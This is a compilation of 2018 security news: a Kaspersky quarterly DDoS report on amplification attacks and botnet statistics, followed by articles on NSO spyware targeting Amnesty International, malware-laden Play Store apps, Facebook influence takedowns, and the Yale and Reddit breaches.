Knowing what we know about the devastating consequences of DDoS attacks, we are not inclined to celebrate when our predictions come true. Alas, our forecast in the previous quarter’s report was confirmed: cybercriminals continue to seek out new non-standard amplification methods. Even before the panic over the recent wave of Memcached-based attacks had subsided, experts discovered an amplification method using another vulnerability—in the Universal Plug and Play protocol, known since 2001. It allows garbage traffic to be sent from several ports instead of just one, switching them randomly, which hinders the blocking process. Experts reported two attacks (April 11 and 26) in which this method was likely used; in the first instance, the DNS attack was amplified through UPnP, and in the second the same was applied to an NTP attack. In addition, the Kaspersky DDoS Protection team observed an attack that exploited a vulnerability in the CHARGEN protocol. A slightly weaker attack using the same protocol to amplify the flood (among other methods) targeted the provider ProtonMail, the reason for which was an unflattering comment made by the company’s executive director.

New botnets are causing more headaches for cybersecurity specialists. A noteworthy case is the creation of a botnet formed from 50,000 surveillance cameras in Japan. And a serious danger is posed by a new strain of the Hide-n-Seek malware, which was the first of all known bots to withstand, under certain circumstances, a reboot of the device on which it had set up shop. True, this botnet has not yet been used to carry out DDoS attacks, but experts do not rule out such functionality being added at a later stage, since the options for monetizing the botnet are not that many.

One of the most popular monetization methods remains attacking cryptocurrency sites and exchanges. What’s more, DDoS attacks are used not only to prevent competitors from increasing their investors, but as a way of making a big scoop. The incident with the cryptocurrency Verge is a case in point: in late May, a hacker attacked Verge mining pools, and made off with XVG 35 million ($1.7 million). In the space of two months, the currency was hacked twice, although the preceding attack was not a DDoS.

Not only that, June 5 saw cybercriminals bring down the Bitfinex cryptocurrency exchange, with the system crash followed by a wave of garbage traffic, pointing to a multistage attack that was likely intended to undermine credibility in the site. It was probably competitive rivalry that caused the renowned online poker site, Americas Cardroom, to suffer a DDoS attack that forced first the interruption and then cancellation of a tournament. That said, it was rumored that the attack could have been a political protest against the in-game availability of Donald Trump and Kim Jong Un avatars.

As always, the most media hype in the past quarter was generated by politically motivated DDoS attacks. In mid-April, British and US law enforcement bodies warned that a significant number of devices had been seized by Russian (supposedly Kremlin-sponsored) hackers in the US, the EU, and Australia with a view to carrying out future attacks. Then just a few days later, in late April, it was a Russian target that got hit: the site of the largest Russian political party, United Russia, was down for two whole days, yet there was precious little public speculation about the masterminds behind the DDoS campaign.

An attack on the Danish railway company DSB, which struggled to serve passengers for several days as a result, was also alleged to be politically motivated. Some see it as a continuation of the attack on Swedish infrastructure last fall.

At the end of the quarter, attention was focused on the Mexican elections and an attack on an opposition party website hosting materials about the illegal activities of a rival. According to the victim, the attack began during a pre-election debate when the party’s candidate showed viewers a poster with the website address. However, it was immediately rumored that DDoS was not the culprit, but the Slashdot effect, which Reddit users also call “the hug of death.” This phenomenon has been around since the dawn of the Internet, when bandwidth was a major issue. But it’s still encountered to this day when a small resource suffers a major influx of legitimate web traffic on the back of media hype.

The Slashdot effect was also observed by the Kaspersky DDoS Protection team in early summer. After a press conference by the Russian president, a major news outlet covering the event experienced a powerful wave of tens of thousands of HTTP GET requests all sent simultaneously. The size of the supposed botnet suggested a new round of attacks involving IoT devices, but further analysis by KDP experts showed that all suspicious queries in the User Agent HTTP header contained the substring “XiaoMi MiuiBrowser”. In fact, owners of Xiaomi phones with the browser app installed received a push notification about the outcome of the conference, and it seems that many took an interest and followed the link, causing a glut of requests.

Meanwhile, law enforcement agencies have been making every effort to prevent organized attacks: in late April, Europol managed to shut down Webstresser.org, the world’s largest DDoS-for-hire service. When it was finally blocked, the portal had more than 136,000 users and had served as the source of more than 4 million DDoS attacks in recent years. After the fall of Webstresser, conflicting trends were reported: some companies observed a significant decline in DDoS activity in Europe (although they warned that the drop was going to be relatively short-lived); others, however, pointed to a rise in the number of attacks across all regions, which may have been the result of attackers seeking to compensate by creating new botnets and expanding old ones.

On top of that, several DDoS attack masterminds were caught and convicted. German hacker ZZboot was sentenced for attacking major German and British firms with ransom demands. However, he avoided jail time, receiving 22 months of probation. At the other end of the Eurasian continent, in Taipei, a hacker named Chung was arrested for allegedly attacking the Taiwan Bureau of Investigation, the Presidential Administration, Chungwa Telecom, and the Central Bank. In the other direction, across the pond, a self-proclaimed hacktivist was arrested in the US for obstructing the work of police in Ohio.

Another, less significant, but more curious arrest took place in the US: an amateur hacker from Arizona was arrested, fined, and jailed after an online acquaintance posted a tweet with his name. Despite his rudimentary skills, the cybercriminal, calling himself the “Bitcoin Baron,” had terrorized US towns for several years, crashing the websites of official institutions and demanding ransoms; in one incident, his actions seriously hindered emergency response services. He too tried to position himself as a cyberactivist, but his bad behavior ruined any reputation he might have had, especially his alleged (only by himself, it should be said) attempt to bring down the site of a children’s hospital by flooding it with child pornography.

Quarter trends
In H1 2018, the average and maximum attack power fell significantly compared to H2 2017. This can be explained by the seasonal slowdown that is usually observed at the start of the year. However, a comparison of H1 indicators for 2017 and 2018 shows a measurable rise in attack power since last year.

Change in DDoS attack power, 2017-2018

One way to increase the attack power is third-party amplification. As mentioned in the news overview, hackers continue to look for ways to amplify DDoS attacks through new (or well-forgotten old) vulnerabilities in widely popular software, not without success, unfortunately. This time, the KDP team detected and repelled an attack with a capacity in the tens of Gbit/s that exploited a vulnerability in the CHARGEN protocol—an old and very simple protocol described in RFC 864 way back in 1983.

CHARGEN was intended for testing and measurement purposes, and can listen on both the TCP and UDP sockets. In UDP mode, the CHARGEN server responds to any request with a packet with a string length from 0 to 512 random ASCII characters. Attackers use this mechanism to send requests to the vulnerable CHARGEN server, where the outgoing address is substituted by the address of the victim. US-CERT estimates the amplification factor at 358.8x, but this figure is somewhat arbitrary, since the responses are generated randomly.

Despite the protocol’s age and limited scope, many open CHARGEN servers can be found on the Internet. They are mainly printers and copying devices in which the network service is enabled by default in the software.

The use of CHARGEN in UDP attacks, as reported by KDP and other providers (Radware, Nexusguard), may indicate that attacks using more convenient protocols (for example, DNS or NTP) are becoming less effective, since there exist well-developed methods to combat this kind of UDP flooding. But the simplicity of such attacks makes cybercriminals unwilling to abandon them; instead they hope that modern security systems will not be able to resist antiquated methods. And although the search for non-standard holes will doubtless continue, CHARGEN-type amplification attacks are unlikely to take the world by storm, since vulnerable servers lack a source of replenishment (how often are old copiers connected to the Internet?).

If cybercriminals are going retro in terms of methods, when it comes to targets they are breaking new ground. DDoS attacks against home users are simple, but not profitable, whereas attacks on corporations are profitable, but complex. Now DDoS planners have found a way to get the best of both worlds—in the shape of the online games industry and streamers. Let’s take as an example the growing popularity of e-sports tournaments, in which the victors walk away with tens—sometimes hundreds—of thousands of dollars. The largest events are usually held at special venues with specially setup screens and stands for spectators, but the qualifying rounds to get there often involve playing from home. In this case, a well-planned DDoS attack against a team can easily knock it out of the tournament at an early stage. The tournament server might also be targeted, and the threat of disruption could persuade the competition organizers to pay the ransom. According to Kaspersky Lab client data, DDoS attacks on e-sports players and sites with the goal of denying access are becoming increasingly common.

Similarly, cybercriminals are trying to monetize the market of video game streaming channels. Streaming pros show live playthroughs of popular games, and viewers donate small sums to support them. Naturally, the larger the audience, the more money the streamer gets for each broadcast; top players can earn hundreds or thousands of dollars, which basically makes it their job. Competition in this segment is fierce and made worse by DDoS attacks with the capacity to interfere with livestreams, causing subscribers to look for alternatives.

Like e-sports players, home streamers have virtually no means of protection against DDoS attacks. They are essentially reliant on their Internet provider. The only solution at present could be to set up specialized platforms offering greater protection.

Methodology
Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor the actions of botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system is part of the Kaspersky DDoS Protection solution, and intercepts and analyzes commands sent to bots from C&C servers. What’s more, the system is proactive, not reactive—there’s no need to wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2018.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.

Quarter results
The stormiest period for DDoS attacks was the start of the quarter, particularly mid-April. By contrast, late May and early June were fairly quiet.
Top spot in terms of number of attacks was retained by China (59.03%), with Hong Kong (17.13%) in second. It also entered the Top 3 by number of unique targets with 12.88%, behind only China (52.36%) and the US (17.75%).
The attacks were quite evenly distributed across the days of the week. The most and least popular were Tuesday and Thursday, respectively, but the difference is slight.
The share of SYN attacks rose sharply to 80.2%; second place went to UDP attacks with 10.6%.
The share of attacks from Linux botnets increased significantly to 94.47% of all single-family attacks.
Geography of attacks
The latest quarter threw up a number of surprises. The leader by number of attacks is still China, with its share practically unchanged (59.03% against 59.42% in Q1). However, for the first time since monitoring began, Hong Kong broke into the Top 3, rising from fourth to second: its share increased almost fivefold, from 3.67% to 17.13%, squeezing out the US (12.46%) and South Korea (3.21%), whose shares declined by roughly 5 p.p. each.

Another surprise package in the territorial ranking was Malaysia, which shot up to fifth place, now accounting for 1.30% of all DDoS attacks. It was joined in the Top 10 by Australia (1.17%) and Vietnam (0.50%), while the big-hitters Japan, Germany, and Russia all dropped out. Britain (0.50%) and Canada (0.69%) moved into eighth and seventh, respectively.

The Top 10 in Q2 also had a greater share of the total number of attacks than in Q1: 96.44% compared with 95.44%.

Distribution of DDoS attacks by country, Q1 and Q2 2018

The territorial distribution of unique targets roughly corresponds to the distribution of the number of attacks: China has the largest share (52.36%), a rise of 5 p.p. against the previous quarter. Second place belongs to the US (17.5%) and third to Hong Kong (12.88%), up from fourth, replacing South Korea (4.76%) (note that in Hong Kong the most popular targets are now Microsoft Azure servers). Britain fell from fourth to eighth, now accounting for 0.8% of unique targets.

The Top 10 said goodbye to Japan and Germany, but welcomed Malaysia (2.27%) in fourth place and Australia (1.93%) just behind in fifth. This quarter’s Top 10 accounted for slightly more of the total number of unique attacks, reaching 95.09% against 94.17% in Q1.

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2018

Dynamics of the number of DDoS attacks
Peak activity in Q2 2018 was observed in mid-April: a significant increase in the number of attacks was registered in the middle third of this month, with two large spikes occurring just days apart: April 11 (1163) and April 15 (1555). The quarter’s deepest troughs came in the second half and at the end: the calmest days were May 24 (13) and June 17 (16).

Dynamics of the number of DDoS attacks, Q2 2018

In Q2 2018, Sunday went from being the quietest day for cybercriminals to the second most active: it accounted for 14.99% of attacks, up from 10.77% in the previous quarter. But gold in terms of number of attacks went to Tuesday, which braved 17.49% of them. Thursday, meanwhile, went in the opposite direction: only 12.75% of attacks were logged on this day. Overall, as can be seen from the graph, in the period April-June the attack distribution over the days of the week was more even than at the beginning of the year.

Distribution of DDoS attacks by day of the week, Q1 and Q2 2018

Duration and types of DDoS attacks
The longest attack in Q2 lasted 258 hours (almost 11 days), slightly short of the previous quarter’s record of 297 hours (12.4 days). This time, the focus of persevering hackers was an IP address belonging to China Telecom.

Overall, the share of long-duration attacks fell by 0.02 p.p. to 0.12%. Whereas the share of attacks lasting from 100 to 139 hours remained the same, the share of attacks from 10 to 50 hours almost doubled (from 8.28% to 16.27%); meanwhile, the share of attacks lasting from five to nine hours increased nearly by half (from 10.73% to 14.01%). The share of short-duration attacks (up to four hours) fell sharply from 80.73% in January to 69.49% in March.

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2018

All other types of attacks decreased in share; UDP attacks are in second place (10.6%), while TCP, HTTP, and ICMP constitute a relatively small proportion.

Distribution of DDoS attacks by type, Q2 2018

Correlation between Windows- and Linux-based botnet attacks, Q2 2018

Geographical distribution of botnets
The Top 10 regions by number of botnet C&C servers underwent some significant changes. Top spot went to the US with almost half of all C&C centers (44.75% against 29.32% in Q1). South Korea (11.05%) sank from first to second, losing nearly 20 p.p. China also dropped significantly (from 8.0% to 5.52%). Its place was taken by Italy, whose share climbed from 6.83% in the previous quarter to 8.84%. The Top 10 saw the departure of Hong Kong, but was joined—for the first time since our records began—by Vietnam, whose 3.31% was good enough for seventh place.

Distribution of botnet C&C servers by country, Q2 2018

Conclusion
In Q2 2018, cybercriminals continued the above-outlined trend of searching for exotic holes in UDP transport protocols. It surely won’t be long before we hear about other sophisticated methods of attack amplification.

Another technical discovery of note is the potential for creating botnets using the UPnP protocol; although evidence for them exists, they are still extremely rare in the wild, fortunately.

Windows botnet activity decreased: in particular, Yoyo activity experienced a multifold drop, and Nitol, Drive, and Skill also declined. Meanwhile, Xor for Linux significantly increased its number of attacks, while another infamous Linux botnet, Darkai, scaled back slightly. As a result, the most popular type of attack was SYN flooding.

The total attack duration changed little since the previous quarter, but the share of medium-duration attacks increased, while the share of shorter ones decreased. The intensity of attacks also continues to grow. The most lucrative targets for cybercriminals seem to be cryptocurrencies, but we can soon expect to see high-profile attacks against e-sports tournaments as well as relatively small ransoms targeting individual streamers and players. Accordingly, there will be market demand for affordable individual anti-DDoS protection.


Amnesty International employee targeted with NSO group surveillance malware
2.8.2018 securityweek 
Virus

An employee at Amnesty International has been targeted with Israeli surveillance malware, the news was revealed by the human rights group.
Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

This SMS message translates to:

“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”

[link]”

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published Amnesty International.

“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”

The servers identified by the experts were matching NSO Group’s description of Pegasus in the Hacking Team leaked document, they found two other connections to NSO Group:

evidence that connects the malicious links used by the attackers and collected with NSO Group network infrastructure that was previously detailed by researchers at Citizen Lab.
a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.
“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]com, pine-sales[.]com, and ecommerce-ads[.]org.” continues the report.

There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.

“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

COUNTRY NEXUS REPORTED CASES OF INDIVIDUALS TARGETED YEAR(S) IN WHICH SPYWARE INFECTION WAS ATTEMPTED
Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018
Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.

“This is a huge market that’s completely opaque and under-regulated,” he concluded.


Hundreds of apps removed from Google Play store because were carrying Windows malware
2.8.2018 securityweek Android

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside.
Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store because they were carrying a Windows malware,

The apps were uploaded to the Google Play store between October and November 2017, this means that for months Android users were exposed to the attack. In some cases, the apps have been downloaded thousands of times and were rated with 4-stars.

The malicious code included in the code of the app was developed to compromised Windows systems and leverage the Android device as an attack vector.

“Notably, the infected APK files do not pose any threat to Android devices, as these embedded Windows executable binaries can only run on Windows systems: they are inert and ineffective on the Android platform.” reads the analysis published by Palo Alto networks.

“The fact that these APK files are infected indicates that the developers are creating the software on compromised Windows systems that are infected with malware. This type of infection is a threat to the software supply chain, as compromising software developers has proven to be an effective tactic for wide scale attacks.”

Palo Alto Networks reported that the malicious PE files when executed on a Windows system will perform these suspicious activities:

Creates executable and hidden files in Windows system folders, including copying itself
Changes Windows registry to auto-start themselves after restarting
Attempts to sleep for a long period
Has suspicious network connection activities to IP address 87.98.185.184 via port 8829
Some of the apps included multiple malicious PE files at different locations, with different file names, anyway the experts the experts noticed that malware were found embedded in most applications.

The researchers discovered that one of malware was included in 142 APKs, a second malicious code was found in 21 APKs. 15 apps were found containing both PE files inside.

In one case, the malicious PE file that was included in the APK of most of the Android apps was a keylogger.

“After investigating all those malicious PE files, we found that there is one PE file which infects most of the Android apps, and the malicious activity of that PE file is key logging.” continues the analysis.

“On a Windows system, this key logger attempts to log keystrokes, which can include sensitive information like credit card numbers, social security numbers and passwords.”

Google play store infected apps

The attackers attempted to conceive the PE files by using fake names that look like legitimate, such as Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

The researchers discovered that not all the apps uploaded by the same developers were infected with the malicious files, likely because they were using different development platform for the apps.

“The malicious PE files cannot directly run on the Android hosts. However, if the APK file is unpacked on a Windows machine and the PE files are accidentally executed, or the developers also issue Windows-based software, or if the developers are infected with malicious files runnable on Android platforms, the situation will go much worse.” concludes Palo Alto Networks.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,”


Facebook reported and blocked attempts to influence campaign ahead of midterms US elections
2.8.2018 securityweek 
Social

Facebook removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the midterm US elections
Facebook has removed 32 Facebook and Instagram accounts and pages that were involved in a coordinated operation aimed at influencing the forthcoming midterm US elections.

Facebook midterm US elections

Facebook is shutting down content and accounts “engaged in coordinated inauthentic behavior”

At the time there is no evidence that confirms the involvement of Russia, but intelligence experts suspect that Russian APT groups were behind the operation.

Facebook founder Mark Zuckerberg announced its response to the recently disclosed abuses.

“One of my top priorities for 2018 is to prevent misuse of Facebook,” Zuckerberg said on his own Facebook page.

“We build services to bring people closer together and I want to ensure we’re doing everything we can to prevent anyone from misusing them to drive us apart.”

According to Facebook, “some of the activity is consistent” with Tactics, Techniques and Procedures (TTPs) associated with the Internet Research Agency that is known as the Russian troll farm that was behind the misinformation campaign aimed at the 2016 Presidential election.

“But we don’t believe the evidence is strong enough at this time to make public attribution to the IRA,” Facebook chief security officer Alex Stamps explained to the reporters.

Facebook revealed that some 290,000 users followed at least one of the blocked pages.

“Resisters” enlisted support from real followers for an August protest in Washington against the far-right “Unite the Right” group.

According to Facebook, fake pages that were created more than a year ago, in some cases the pages were used to promote real-world events, two of them have taken place.

Just after the announcement, the US Government remarked it will not tolerate any interference from foreign states.

“The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation-state or other malicious actors,” deputy press secretary Hogan Gidley told reporters.

The investigation is still ongoing, but the social media giant decided to disclose early findings to shut down the orchestrated misinformation campaign.

Nathaniel Gleicher, Head of Cybersecurity Policy at Facebook, explained that the threat actors used VPNs and internet phone services to protect their anonymity.

“In total, more than 290,000 accounts followed at least one of these Pages, the earliest of which was created in March 2017. The latest was created in May 2018.
The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend.” said Gleicher.
Facebook announced it would start notifying users that were following the blocked account and users who said would attend events created by one of the suspended accounts and pages

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.


Ten years ago someone breached into a server of the Yale University
2.8.2018 securityweek Incindent

Ten years ago someone breached into a server of the Yale University, but because the intrusion happened nearly ten years ago there is much more information about how it occurred.
After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached into the database of the famous University between April 2008 and January 2009 and apparently accessed a server where it is hosted a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.

yale university

The database contained data of individuals affiliated with the university, the unauthorized access was discovered on June 16, 2018, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to understand how attackers hacked the server either “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, it sent a notice letter to 97% of affected people in the Yale community.

Unfortunately, there is another disconcerting news for the Yale community, a letter sent by the University to the State of New Hampshire Attorney General, revealed that the same server was hacked a second time between March 2016 and June 2018.

This second intrusion caused the exposure of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale is offering identity monitoring services to all affected U.S. residents through the Kroll security firm. At the time there is no indication that the exposed data has been misused.


Reddit discloses a data breach, a hacker accessed user data
2.8.2018 securityweek Incindent

Reddit Warns Users of Data Breach
Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data.
Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data.

The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.

The data breach was discovered on June 19, 2018, according to Reddit, between June 14 and 18, 2018, the attacker compromised some of the employees’ accounts with the company cloud and source code hosting providers.

“A hacker broke into a few of Reddit’s systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords. Since then we’ve been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again.” reads a data breach notification published by the company.

Reddit users that are still using the same password since 2007 have to do it now and change the password for any service where they share the same login credentials.

The hacker did not gain write access to Reddit systems containing backup data, source code, and other logs.

The company explained that the accounts were protected with two-factor SMS-based authentication, a circumstance that suggests the attackers were in the position to intercept authentication codes sent via SMS.

“Already having our primary access points for code and infrastructure behind strong authentication requiring two factor authentication (2FA), we learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept. We point this out to encourage everyone here to move to token-based 2FA.” continues Reddit.

reddit data breach

The company has taken steps to lock down and rotate all production secrets and API keys, and to enhance our monitoring systems.

Reddit already reported the security breach to law enforcement and is notifying affected urging to change their passwords.

Let me close with this Q&A published by Reddit:

What information was involved?

Since June 19, we’ve been working with cloud and source code hosting providers to get the best possible understanding of what data the attacker accessed. We want you to know about two key areas of user data that was accessed:

All Reddit data from 2007 and before including account credentials and email addresses
What was accessed: A complete copy of an old database backup containing very early Reddit user data — from the site’s launch in 2005 through May 2007. In Reddit’s first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then.
How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you’re clear here. Check your PMs and/or email inbox: we will be notifying you soon if you’ve been affected.
Email digests sent by Reddit in June 2018
What was accessed: Logs containing the email digests we sent between June 3 and June 17, 2018. The logs contain the digest emails themselves — they look like this. The digests connect a username to the associated email address and contain suggested posts from select popular and safe-for-work subreddits you subscribe to.
How to tell if your information was included: If you don’t have an email address associated with your account or your “email digests” user preference was unchecked during that period, you’re not affected. Otherwise, search your email inbox for emails from [noreply@redditmail.com](mailto:noreply@redditmail.com) between June 3-17, 2018.


Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek 
Social 

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamps said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."


Mimecast Acquires Threat Detection Startup Solebit for $88 Million
1.8.2018 securityweek   IT

Email and data security firm Mimecast (NASDAQ: MIME) announced on Tuesday that it has acquired threat detection firm Solebit for approximately $88 million net of cash acquired.

Founded in 2014 by cybersecurity experts from the Israel Defense Forces (IDF), Solebit announced that it had raised $11 million in Series A funding in March 2018.

Solebit’s technology helps detect and protect against zero-day malware and unknown threats in data files and links to external resources/URLs.

“Security methods like signature-based antivirus and sandbox detonation are too limited when it comes to today’s most advanced threats,” said Peter Bauer, chief executive officer at Mimecast.

“Solebit has developed a differentiated approach that is engineered to preclude the need for signatures and sandboxes,” the company explains. “It is designed to help customers find advanced threats by recognizing when there is malicious code embedded within active content and data files.”

Mimecast says that Solebit’s threat detection tools are already integrated into Mimecast Targeted Threat Protection products.

London, UK-based Mimecast announced earlier this month that it had acquired Bethesda, Md-based security training company Ataata.

“Combined with the recent acquisition of Ataata in the security awareness and training space, and the recently previewed early adopter web security program, Solebit brings another important set of microservices to the Mime|OS platform that all of Mimecast’s unified services are built upon,” the company says.

Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.

